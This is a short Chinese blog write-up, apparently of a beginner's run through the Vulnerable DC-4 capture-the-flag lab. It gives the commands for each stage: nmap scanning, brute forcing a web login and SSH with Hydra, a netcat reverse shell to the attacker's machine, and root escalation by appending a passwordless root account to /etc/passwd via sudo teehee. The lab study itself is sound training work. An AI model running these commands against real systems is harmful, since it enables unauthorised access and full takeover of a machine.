搭建环境
攻击机:Kali-linux-2022.1:192.168.31.120
靶机:Vulnerable-DC-4:192.168.31.247
信息收集
主机探活
arp-scan -l 或 nmap -sP 192.168.31.0/24
nmap扫描靶机IP
1 | nmap -A -p- 192.168.31.247 |
渗透测试
发现开放了22和80端口,访问80端口

发现是一个登录窗口,用bp爆破得到密码happy
第一次登陆失败,再登陆一次
发现有命令执行
在kali上开启监听2222端口
nc -lnvp 2222

执行反弹shell的命令
nc -e /bin/bash 192.168.31.120 2222
get shell成功

用python进入交互模式
python -c ‘import pty;pty.spawn(“/bin/sh”)’

打开根目录,在jim中的backups发现密码
打开发现是密码

把密码放在本地的pass.txt中,用户名为jim
然后用hydra进行爆破得到密码jibril04
1 | hydra 192.168.31.247 -L user.txt -P pass.txt ssh |
用得到的账号密码连接ssh进行登录
发现有一封邮件,找到并打开发现是charles交给jim的密码
发现charles用户的密码
^xHhA&hvim0y
通过ssh登录到charles
进行teehee提权
echo “admin::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
得到flag
总结
第一次打靶机,感觉确实挺难的,打的浑浑噩噩,不过还好,旁边有同志指导。接下来一边写博客然后再做一遍,没有第一次如同被抓小白兔的慌乱了。感觉自己学的还是很浅的,就像某大学的某“某知名书法家”说的一样吧,具体说什么就不赘述了。希望每天都很充实,回见!